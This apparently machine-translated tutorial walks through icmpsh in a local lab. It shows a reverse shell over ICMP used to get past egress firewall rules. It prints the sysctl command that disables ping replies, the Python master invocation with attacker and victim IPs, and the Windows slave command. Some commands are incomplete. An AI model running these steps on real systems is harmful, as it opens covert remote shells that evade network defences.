Reverse icmp_shell


A very old technique, learn.

Brief introduction of ICMP protocol working mode

Internet Control Message Protocol (ICMP) is one of the Internet protocol families. It is used in network equipment, including routers, to send error messages and operation information, indicating that the requested service is unavailable or the host / route is unreachable. The ping command uses the third layer, the network layer protocol, to send a message through the ICMP payload. The packet will be encapsulated with an IP header. Due to MTU limitations, the size of ICMP packets cannot be greater than 1500 bytes.

ICMP packets in the network layer

 The Ping command sends an IMCP echo request to the target host. If the target host replies with an echo response, the host is alive

Scene introduction

Sometimes, network administrators use a variety of firewalls, which is very difficult for penetration testing. There is a firewall like this: one that allows known machine traffic on ports and services (ingress filtering) and has powerful egress access control List settings.

When you already own a machine internal network or part of DMZ. He did not obtain the reverse shell through TCP, so he did not consider binding the shell.

However, regarding UDP, it is usually a DNS tunnel or ICMP channel to obtain a reverse shell. The ICMP is the focus of this tool. icmpsh is a simple reverse ICMP shell,

It uses C ( icmpsh-mc ), Perl ( ), Python ( ) to make win32.slave compatible with the original POSIX.

Its main advantage over other similar open source tools is that it does not require administrator rights to run on the target machine. The tool is simple, convenient and portable (cross-platform).

This script is mainly for windows, he is a C / S architecture: slave (client) it is written in C and can only run on windows,

The master (server) is cross-platform, and the author has ported C and Perl to Python.

For detailed usage, please refer to:

Local experiment



First, on the victim's machine, I set up an outbound rule with the firewall, the protocol type is TCP, and the port is 6060

We use python2.7 on kali to start a server running on port 6060

Starting from port 80 is the apache server

Local access

Then use the target machine to access the designated port to test whether the outbound rules are normal

Do not specify the default, access port 80

Here is just to verify that if the server is set to export access control list, you can complete a reverse icmp shell through icmp protocol.


Use the first command to turn off the ping reply, this can prevent the kernel from responding to the ping packet itself, and only use the attacker

sysctl -w net.ipv4.icmp_echo_ignore_all = 1 > / dev / null 
python 192.168 . 41.136  192.168 . 41.128 
#python attacker ip victim ip

Here is an error, read the py file

Then kali is speechless without pip. Reference

The thief is slow, then install a package and the thief is slow, and then the new version of kali is not installed vxxxy and go to configure, this series.


icmpsh.exe -t -d 500 -b 30 -s 128


Execute whoami


Guess you like